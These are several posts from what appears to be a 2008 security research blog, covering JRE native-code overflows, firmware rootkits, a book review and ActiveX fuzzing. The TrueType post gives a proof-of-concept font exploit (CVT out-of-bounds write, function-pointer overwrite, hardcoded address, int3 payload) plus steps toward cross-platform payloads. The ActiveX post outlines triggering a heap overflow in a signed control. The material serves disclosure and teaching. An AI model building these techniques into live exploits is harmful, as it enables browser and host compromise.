Sun have now fixed this issue so the applet you can retrieve from https://applet-launcher.dev.java.net is no longer vulnerable. Since the JAR is not an officially supported product, there will be no Sun Alert released. And given the prerequisites for this attack (you have to coerce a user into visiting a malicious web site then have the user agree to run the control [unless of course they have trusted Sun as a publisher] then you need a hacked up web server), I do not consider this issue to be especially serious. That said, its worth checking your Java trusted certificate store to see exactly which publishers you currently trust. You can get to this via the Java Control Panel (C:\Windows\system32\javacpl.cpl):



Anyway I'll be revisiting signed applets in a future post. In the meantime, my advice is beware of always trusting the publisher.




Cheers

John


* Though the dialogs boxes look pretty similar and present the same information, the bottom panel is used to communicate different messages: Microsoft warn you that the file could harm your computer; Sun tell you that the certificate chains to a trusted root CA certificate (which is redundant, as they've already told us "the application's digital signature has been verified" in the top panel).


** If you want to check out some of the Java community's feedback to this dialog box, check out the comments on Stanley Ho's blog post from 2005, Deployment: Goodbye scary security dialog box!

Wednesday 20 February 2008

Thoughts on Firmware Rootkits

Over the last couple of years I've presented a number of low level attacks aimed at demonstrating off-disk rootkit persistence in firmware.


Vulnerability research into hardware typically has a high barrier to entry; development boards and hardware debuggers are expensive and specs are often unfathomable or hundreds of pages long (or both). That said, tools like Bochs (an open source IA-32 emulator with integrated debugger allowing you to debug the VM from the first very instruction) and the MindShare books are great resources.


So why go to the effort of hacking hardware? Well I believe its a fruitful research area, after all, the OS is only as secure as the hardware its running on and as more and more machines ship with TPMs (and software to make use of them) the need for independent researchers to cast a critical eye over these technologies is greater than ever, especially in light of analyses such as Christiane Rütten's investigation into an encrypted harddrive enclosure (a kind of technical version of the Emperor's New Clothes).


Previously I've focused on the Advanced Configuration and Power Management Interface (ACPI), PCI Option ROMs and the Extensible Firmware Interface (EFI*). The concepts behind most of the attacks I've covered are not new (is there ever anything in security that is truly new?) At the time that I carried out the research, however, I found no practical information on firmware attacks hence I set out to determine how feasible they really were, what they might look like from a defensive perspective and how different hardware and firmware implementations affected things.


So anyway, its been a while since I've released any material in this area but let me assure you there is some on the way. I recently spoke to Deb Radcliff for an article in this month's SC Magazine. The crux of the article is that a modern PC is complex system containing many peripherals devices, each with its own CPU, its own firmware and its own interface to this firmware. If we assume that a given secure boot process will measure all firmware containing instructions for the main CPU, the question is how does it locate and measure the firmware specific to each device? On a system with a TPM and a secure boot process, there is still potential to reflash a device's firmware in order to run a rootkit on the device itself... why run on the main CPU, risking detection, if you can interact with main memory and the I/O space from a peripheral?


You'd be surprised exactly what you can attack from the OS without physical access to the machine. In the article I use smart batteries as an example. There's a good chance that your notebook's battery firmware (data and potentially code) can be updated from the OS. For the incredulous among you, check out the following passage from Atmel’s ATmega406 AVR Microcontroller whitepaper:


The ATmega406 facilitates safe in-field update through self-programming. The ATmega406 CPU can access and write its own program memory. Atmel’s self-programming has true read-while-write capabilities, so critical parts of the battery application can be allowed to remain running while the update is in progress. Since the programming is CPU-initiated, the device is able to receive updates through any supported interface. This means that the SMBUS interface between the PC and battery in effect can be used for in-field updating of the battery. This is by far the most flexible option, as the update can be implemented as a program running on the host PC.


For a more rigorous treatment of trusted computing with untrustworthy devices, I highly recommend Hendricks and van Doorn's paper from 2004, Shoring up the Trusted Computing Base.






Cheers

John




* I'll blog on EFI in a future post. If you've never heard of it or don't know much about it you're probably a Windows XP or Vista user, who as Apple puts it, is "stuck in the 1980s with old-fashioned BIOS" :)

Wednesday 13 February 2008

Review of The Web Application Hacker's Handbook



You might be forgiven for thinking that I would give a harsh review to a book whose co-author once had a unfortunate vommiting incident in my near vicinity. My very near vicinity *. That said, I know first hand that both Dafydd Stuttard and Marcus Pinto, colleagues of mine at NGS worked extremely hard on this book so I'll try and give an honest review...

WAHH is a book primarily for pen testers, though developers of web application would do well to read it too. The first thing that struck me is that it has a logical flow to it; chapters on the evolution of web applications, core defensive mechanisms and web application technologies are followed by mapping the application and attacking key components prior to the introduction of more advanced topics such as automation. WAHH is a hefty 700 pages split into 20 chapters. I made some notes as I went through it, which I've written up below.


What I liked about WAHH:

  • Chapter 11 - Attacking Application Logic; this chapter presents 11 real-world examples. Its hard to describe a generic approach to detecting logic flaws in an application, as the authors point out, but they've managed to do a good job of imparting the mindset required to find logic bugs, breaking each example into three sections: the functionality, the attack and the (misplaced) assumptions . This chapter could have easily ended up coming across as two pen testers wheeling out old war stories but instead its an interesting read. Example 8, "Escaping from Escaping" (the developers forgot to escape the escape character) is a classic.

  • Chapter 13 - Automating Bespoke Attacks shows how to automate an attack against a specific application by creating your own Java-based tool. Its great to see the authors present this kind of information from first principles rather than simply refering the reader to a pre-made tool as so many security books seem to do. Of course, the hugely powerful Burp Intruder, written by Dafydd makes an appearance later in the chapter but the underlying message is automation can saves you heaps of time, and if there isn't a tool out there that does what you need, write one!

  • Chapter 15 - Attacking Compiled Applications, provides a solid overview of typical implementation flaws such as buffer overflows, integer overflows and format strings. Its good to see mention of FormatMessage vulnerabilities. Whilst many web app tests won't involve any direct testing of components written in native code (with the exception of the web server etc.), all pen testers should at least be comfortable code reviewing simple CGIs written in C. I also found chapter 18 - Finding Vulnerabilties in Source Code a handy cheat sheet for obvious things to look for in the common web languages.

  • Chapter 20 - A Web Application Hacker's Methodology. A methodology is an important part of pen testing to ensure consistent results through a base level of testing. Its a difficult thing to write as it has to be generic enough to apply to a sizeable number of application scenarios but if its too generic its just not useful (not to mention most pen testers run a mile when asked to work on documentation!) Conveniently Daf and Marcus provide a comprehensive real-world, ready to use methodology at the end of WAHH.


What I Didn't Like

  • There is no mention of Silverlight. Chapter 5 covers "thick client technologies" - Java, ActiveX and Flash but not Silverlight. I do not envisage many financial institutions creating applications in Silverlight (in the same way that they don't use Flash either), however I believe we shall see a slow but steady increase in its mainstream popularity so it would have been nice to see some coverage of Silverlight-specific tools, such as Silverlight Spy. As an aside I am also not convinced on the use of the term "thick client" in the context that the authors use it, though its obvious what is meant.

  • The MSSQL information in the SQL injection section seemed more SQL Server 2000-centric than 2005 e.g. there was no mention of xp_cmdshell being off by default in SQL Server 2005 (it is enabled by executing the sp_configure stored procedure).

  • There was little mention of WebDAV. I would have liked to have seen a little more coverage of WebDAV, exploiting misconfigurations, information disclosure and so on since a great many content management systems use it and it is popular with online office suites like Zimbra and ThinkFree.

  • The discussion of decompiling Java applets was vague ("For various reasons, Jad sometimes does not do a perfect job of decompiling bytecode"). And though JSwat is mentioned in passing I would have liked to have seen an example of hotswapping a class in an applet to bypass a client-side check.

  • The ActiveX section could do with some further detail. There's no mention of IObjectSafety nor property bags and the only fuzzer mentioned is COMRaider (you might also try AxMan or AxFuzz). SiteLocking is mentioned but not by name. In addition, the authors talk about repurposing ActiveX controls but do not mention that this also applies to signed Java applets, which can also expose dangerous methods in exactly the same way.


Conclusion

All in all I highly recommend this book to pen testers, web application developers and anyone interested in the evolution of web security. Its great to see all this information in one place and my minor grumbles above certainly do not detract from an informative, enjoyable read. I thought it read very well, breaking up technical discussion with humour ("whatever your opinion of the threat posed by XSS vulnerabilities, it seems unlikely that Al Gore will be producing a movie about them any time soon.") It has clearly gone through diligent editing which seems to be lacking in many tech books these days (reminding me of a lecturer I had at university who had written the course text; he paid out a small reward every time someone found a mistake or typo in it - I challenge Daf and Marcus to do the same!)




Cheers

John


* Ask PortSwigger.

Wednesday 30 January 2008

Three Categories of Buffer Overflow in the JRE

Some people think that writing code in Java is a silver bullet against implementation flaws such as buffer overflows. The truth is a little murky. Certainly, there is no provision for overflows in pure Java code; reading or writing past the end of an array generates an exception, as the following toy code demonstrates:



public class overflow
{
public static void main(String args[])
{
char buf[] = new char[10];
String src = args[0];

for (int i = 0; i < src.length(); i++)
{
buf[i] = src.charAt(i);
}

System.out.println("buf is " + new String(buf));
}
}


C:\dev>java overflow foobar1234
buf is foobar1234


C:\dev>java overflow foobar12345
Exception in thread "main" java.lang.ArrayIndexOutOfBoundsException: 10
at overflow.main(overflow.java:10)


But real code, though it might be written in 100% Java, depends heavily on the Runtime Environment (JRE) and the JRE contains methods that are written in straight C. We all know what happens when C hangs out with its buddies: fixed size buffer, strcpy and user input.


So how do you even start to assess the attack surface of the JRE? Perhaps I'll go into this in more detail in a future post if anyone is interested, but briefly for now, if we discard logical flaws in the JRE that let you escape the sandbox (as attempting to measure exposure to these is really hard) and concentrate solely on the native code parts, we can:

  • Determine the amount of native code within the JRE:

    • Download the Java source code and search for the JNIEXPORT and JNICALL macros to detect native methods, e.g.:


      src/share/native/sun/awt/image/gif/gifdecoder.c:

      JNIEXPORT jboolean JNICALL
      Java_sun_awt_image_GifImageDecoder_parseImage(JNIEnv *env,
      jobject this,
      jint relx, jint rely,
      jint width, jint height,
      jint interlace,
      jint initCodeSize,
      jbyteArray blockh,
      jbyteArray raslineh,
      jobject cmh)
      {
      ...


    • Or alternatively dump the exports of the DLLs within the JRE bin directory, e.g.:


      C:\dev> dumpbin /exports jpeg.dll | findstr /c:"_Java_"

      _Java_com_sun_imageio_plugins_jpeg_JPEGImageReader_abortRead@16
      _Java_com_sun_imageio_plugins_jpeg_JPEGImageReader_disposeReader@16
      _Java_com_sun_imageio_plugins_jpeg_JPEGImageReader_initJPEGImageReader@8
      _Java_com_sun_imageio_plugins_jpeg_JPEGImageReader_initReaderIDs@20
      _Java_com_sun_imageio_plugins_jpeg_JPEGImageReader_readImage@80


    • Or enumerate all methods of all classes in the runtime and count up those marked as native. This can be done in a few lines of code using the Byte Code Engineering Library (BCEL), a great project for low level manipulation and construction of classes.


  • With a list of the native methods, perform some static analysis to score each method - how much code does it contain (including all the code within all function calls), does it process data that might be untrusted and so on.


  • Now trace or perform static analysis on your application - your applet, servlet etc. - to determine which methods you touch.


But I digress. The main point of this post is to highlight three categories of buffer overflow that exist within the JRE, so here they are:


  1. Buffer overflows in file format parsers


    Much of the JRE file format parsing code is implemented in native code, typically either for speed or because the code originated elsewhere. This includes BMP, GIF, JPEG, ICC, TTF and Soundbank parsing, and a few I've probably forgotten.


    Incidentally I was first alerted to this when a Java application I was running (it happened to be Burp Proxy, seriously!) started crashing, leaving the familiar hs_err.log file behind. The log showed that I was triggering an access violation in fontmanager.dll, which I tracked down to a corrupted TrueType font I had in my fonts folder (TrueType fonts are hard things to parse - there's a mixture of 16 and 32 bit fields, lengths, offsets and to cap it all, provision for a virtual machine, as you'll already know if you read my last post!).


    Chris Evans did some great write ups on the bugs he found in the JRE image parsers here and here.


  2. Buffer overflows in the platform API wrapper code


    In addition to file format parsers, methods that interact with the OS are also ultimately implemented in native code as they need to call the appropriate platform API. These methods typically need to convert Java datatypes such as a String into a C datatype, such as a wide character array. Sound like a potentially hazardous operation? Well my colleagues at NGS, Wade Alcorn ("The King of BeEf") and Marcus Pinto (of Web Application Hacker's Handbook fame) found such a bug in BEA's JRockit JVM. The NGS advisory is here. This issue could be triggered remotely as an unauthenticated user against WebLogic Server by requesting a long URL (!) which triggered an overflow as the path was canonicalised.


  3. Buffer overflows in the underlying platform APIs


    The previous category comes about from insecurely preprocessing data before handing it off to a platform API. Let's consider the opposite - doing no processing and exposing a bug in a platform API. A notable example of this category is a critical vulnerability discovered by Peter Winter-Smith, another colleague of mine at NGS. He found an overflow that could be triggered by passing a string of 65536 bytes to gethostbyname, exported by ws2_32.dll. This issue was fixed in MS06-041 (NGS advisory here). It was trivial to generate Java code to hit this bug.


    Now you may be thinking that it isn't really fair to call this a Java problem as it is clearly an OS/third party library bug. Perhaps it isn't fair :) It is interesting though that in some areas of the JRE, the layer on top of the platform APIs is so thin that these types of bug are exposed (I think Peter actually found the gethostbyname bug while testing a Java application!) Also note that this further complicates attack surface analysis :(


A final note on how these affect different types of Java application. The example I gave in (2), is a clear example of buffer overflow in the Java runtime that can be used to compromise a server. The examples in (1) and (3) less so. Its feasible that a Java Enterprise application may parse a file uploaded by a user but it obviously depends on the purpose of servlet. On the other hand, a malicious applet that attempts to exploit the browser through a file format bug in the JRE is certainly conceivable.


And as for mobile Java, their runtime implementations do not typically share the native code components with the desktop JRE so the chances of there being an all conquering cross-device cross-architecture cross-Java implementation vulnerability are pretty slim (despite news to the contrary), though I'll stop short of saying impossible :)




Cheers

John

Thursday 24 January 2008

A Cross-browser, Cross-platform, Cross-architecture Bug in the JRE











pwned.



In October 2007 I released an advisory in Sun's Java Runtime Environment versions 1.5.0_09 and below (NGS link here, SunSolve here). The bug in question allowed an attacker to craft a malicious TrueType font that could execute arbitrary native code when processed by a Java applet, thus compromising the browser. I gave partial details in the original advisory but have decided to discuss it in a bit more detail here.



What makes TrueType fonts more interesting than a run-of-the-mill file format is that they contain code. Surprising as it may seem, TrueType fonts can contain instructions for a virtual machine. Wikipedia has a good summary:


TrueType systems include a virtual machine that executes programs inside the font, processing the "hints" of the glyphs. These distort the control points which define the outline, with the intention that the rasterizer produces fewer undesirable features on the glyph. Each glyph's hinting program takes account of the size (in pixels) that the glyph is being displayed at, as well as other less important factors of the display environment.


Although incapable of receiving input and producing output as normally understood in programming, the TrueType hinting language does offer the other prerequisites of programming languages: conditional branching (IF statements), looping an arbitrary number of times (FOR- and WHILE-type statements), variables (although these are simply numbered slots in an area of memory reserved by the font), and encapsulation of code into functions. Special instructions called "delta hints" are the lowest level control, moving a control point at just one pixel size.


So to the flaw in the JRE. Firstly I should state that the TTF parsing code and the virtual machine were written in C (not Java) and exposed via JNI. This means we are into the realms of common implementation flaws - buffer overflows, integer overflows and the like.


The VM implements two instructions for writing values to the Control Value Table (CVT). The CVT holds global variables that can be used by multiple glyphs - its basically a global data store. One of instructions for writing to the CVT did not verify that the supplied index lay within the bounds of the CVT. This allows us to write a scaled value relative to the base of the CVT. Through experimentation (though this is probably documented somewhere) I determined that the scaling factor is based on the requested size of the font - setting this to 32 results in a factor of 1.


Since the CVT is dynamically allocated we don't quite have an arbitrary write to an arbitrary location yet. We must first determine where the CVT is located. Fortunately the instruction to read from the CVT also doesn't valid its index so we can read memory relative to the CVT. Again from experimentation I determined that at 0x38 DWORDs prior to the CVT (i.e. a negative offset) there is a pointer that points to the end of CVT. Given that we know the size of the CVT we can determine the base of the CVT and therefore write an arbitrary value to an arbitrary location.


The nice thing about this bug is that we can repeatedly call the write primitive above which means there are countless ways to exploit it. I chose to overwrite a function pointer for one of the virtual instructions, then call this instruction. The value I overwrite the function pointer with (i.e. the address of my payload) is the address of the CVT itself. What about DEP? Java and DEP don't get along so the chances are, if the user has used the Java plugin before, DEP will be disabled. This means we can execute our payload straight from the heap.


Here's what you'll need to write a PoC:


  1. First, the easy bit, a Java applet to load the font. For convenience sake we can package the font with the applet inside a JAR file. The alternative is that we load the font from a web server (subject to the same origin policy, of course) or that we put it inside our class file as an array of bytes, accessed via a ByteArrayInputStream. To trigger loading of the bug and execution of our TTF instructions we simple CreateFont, set it to the appropriate size and render some text:

    InputStream is = this.getClass().getResourceAsStream("exploit_font.ttf");
    Font font = Font.createFont(Font.TRUETYPE_FONT, is);
    font = font.deriveFont(32.0f);
    Graphics g = this.getGraphics();
    g.setFont(font);
    g.drawString("This will trigger the bug", 20, 20);


  2. Next on to the font itself. Documentation on the TrueType instruction set may be found here. To construct the font I used the TTIComp TrueType instruction compiler. TTIComp takes as input a TTI file (containing our functions) and a TTF file. It produces a new TTF containing our compiled functions. TTIComp comes with some examples and a great tutorial for getting started.


  3. And finally the TTI itself. It looks something like this:

    #input "original_font.ttf"
    #output "exploit_font.ttf"

    #cvt cvt0: 0

    // This is our definition of the preparation
    // function
    // This will get called repeatedly when rendering
    // text in this font

    void prep()
    {
    // Function 0x89 is getInformation
    int iFn = 0x89;

    // Address of function pointer table for
    // JRE 1.5.0_07
    int iFnPtrTable = 0x6D27BB00;

    // End of CVT
    int iEndCVT = int(getCVT(uint(-0x38)));

    // Location we need to overwrite
    int iLocation = iFnPtrTable + int((fixed(iFn) * 4.0));

    // Fill CVT with our payload (some int 3's)
    setCVT(uint(0), 0xCCCCCCCC);

    // Perform overwrite
    // We substract 4 from iEndCVT to get the address
    // the start of the CVT (i.e. the address of our
    // payload)
    setCVT(uint(fixed(fixed((iLocation - iEndCVT)) / 4.0)), iEndCVT - 0x4);

    // Trigger payload by calling getInformation
    getInformation(uint(0));
    }


You'll note that I use a hardcoded address for the table of instruction pointers. I'm lazy, sue me. I suspect the base address of fontmanager.dll, the DLL containing the font parsing code, doesn't move across versions of the JRE so you could scan for the table fairly easily.


And our payload of int3's isn't very interesting. Ideally our stager payload should allocate some memory, copy our second stage payload into it and kick off a new thread from this address. This ensures that the Java plugin/font manager code can keep running as normal (we don't want to be executing code from the CVT when the font's resources are freed).


Finally, what makes bugs in the Java plugin so dangerous is that most of them can be exploited cross-browser, cross-platform, cross-architecture. To write an exploit capable of this, create TTFs as above but with payloads specific to a particular scenario (OS) and add some logic to determine which font to render. An unsigned applet can access properties such as os.name and os.architecture to assist in this.


That wraps up discussion of this bug. I'll be posting more on specific Java plugin issues in the coming months and I have a post in the pipeline that debunks the most common Java security misconceptions so keep an eye out for that.




Cheers

John

Thursday 17 January 2008

Fuzzing ActiveX? Don't Forget The Property Bags


(Note: I have a back log of posts so I'll be posting a fair amount over the next month)


There are several tools out there to fuzz ActiveX controls. COMRaider is one such tool, which is a useful addition to any bug hunter's toolkit. I am going to discuss a limitation that you should be aware of if you are testing ActiveX controls, namely that it doesn't fuzz property bags.


I was going to start by reproducing the definition of the OBJECT tag from the HTML DTD but its pretty big, so here's an example instead:


<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" width="300" height="120">
<param name="movie" value="flash.swf">
<param name="quality" value="high">
<param name="bgcolor" value="#FFFFFF">
</object>


In order to investigate the methods and get/set-able properties of a particular ActiveX control such as the Shockwave plugin, we can fire up the Microsoft OLE/COM Object Viewer (oleview), or programmatically create the object and ask it what it does through the IDispatch interface.


But methods and properties are not the only way we can interact with ActiveX controls. What about the name value pairs supplied via the PARAM tag above (movie, quality and bgcolor)? What other parameters might our target control accept, and how do we determine these? Well we have three options:


  1. Search for web pages that instantiate the control and note the parameters they pass (or the control's documentation in the case of a control like Shockwave). This approach is fine for obtaining the normal use parameters, but what if the control has interesting debug parameters that are undocumented?

  2. Run "strings" over the binary and treat each character string as the name of a parameter. This approach is viable but depending on the number of strings returned, may result in an unrealistic amount of test cases.

  3. Implement the required ActiveX container interfaces and let the control tell us what parameters it will accept. Clearly an optimal approach, this is what we shall focus on.

The parameter mechanism is implemented by the IPropertyBag interface in the container (i.e. Internet Explorer, your fuzzer, TstCon) and the IPersistPropertyBag interface in the control itself. There are also enhanced versions of these interfaces, IPropertyBag2 and IPersistPropertyBag2 though most controls I've seen don't use these (in fact the QuickTime plugin is one of the only controls I've seen with an IPersistPropertyBag2).


So in order to enumerate a control's parameters, also we have to do is implement IPropertyBag. This is actually pretty simple, since the interface only exposes two methods:


ReadTells the property bag to read the named property into a caller-initialized VARIANT.
WriteTells the property bag to save the named property in a caller-initialized VARIANT.


Time for an example. A while back when first looking into property bags I discovered a bug in the version of Yahoo! Messenger I happened to have installed. As it turned out, I had an outdated version and newer versions had fixed the issue, which had been reported to Yahoo! by iDefense.


There was a heap overflow in ymmapi.dll within the safe-for-scripting ymmapi.ymailattach.1 component. The vulnerable version of the control is still hosted on Yahoo.com here in a signed CAB file, though I warned them of this in November '06. The idea of flawed but signed code floating around the Internet is a scary one though the logistics of dealing with this are more of a Microsoft ActiveX design problem which I will discuss another time.


Back to the example in hand. Let's see how we can programmatically enumerate the supported parameters, pass a long string to each of them, locate the overflow and generate some equivalent HTML. I'm not going to give you the actual code (where's the fun in that?) but here's the set of steps required:


1. Initialise COM via CoInitialize.


2. Convert the supplied ProgID into a CLSID via CLSIDFromProgID if you don't already have it.


3. Create an instance of the ActiveX control via CoCreateInstance.


4. Call QueryInterface to request the IPersistPropertyBag interface.


5. Call the Load method of this interface passing it a pointer to our IPropertyBag implementation. Implementing a rudimentary IPropertyBag is simple - if you're happy to break the rules of COM for a simple PoC just implement stubs for QueryInterface, AddRef, Release and Write (obviously not recommended if you want to write anything more than a PoC). The only method that actually needs to do anything is Read.


6. The Read method of our IPropertyBag will be called each time the control requests the value of a specific parameter. We must reply with a VARIANT of type BSTR. Supply an empty string if you just want to enumerate the parameters or return your fuzz string. Once we trigger heap corruption, our process will AV so its best to run it in a debugger (and enable page heap with gflags).


If you go through the above steps and run your code on the ymmapi.ymailattach.1 control (having registered the control with regsvr32 first if you downloaded the CAB), you should find it breaks soon after receiving a long string in response to the Read for the "TextETACalculating" property.


Generating an HTML test case to reproduce this is easy - use JavaScript to dynamically create an OBJECT tag and the following function to build a string of suitable length (which I borrow from here):


String.prototype.repeat = function(l)
{
return new Array(l+1).join(this);
}

var fuzzstring = "a".repeat(50000);>


Giving you something like this when you load it into IE and your debugger kicks in:


The obligatory OllyDbg shot


So that's it for now. I'll be posting more on ActiveX in future posts. I want to cover killbits, ActiveX design limitations, and how to detect and handle sitelocking when fuzzing.


Cheers

John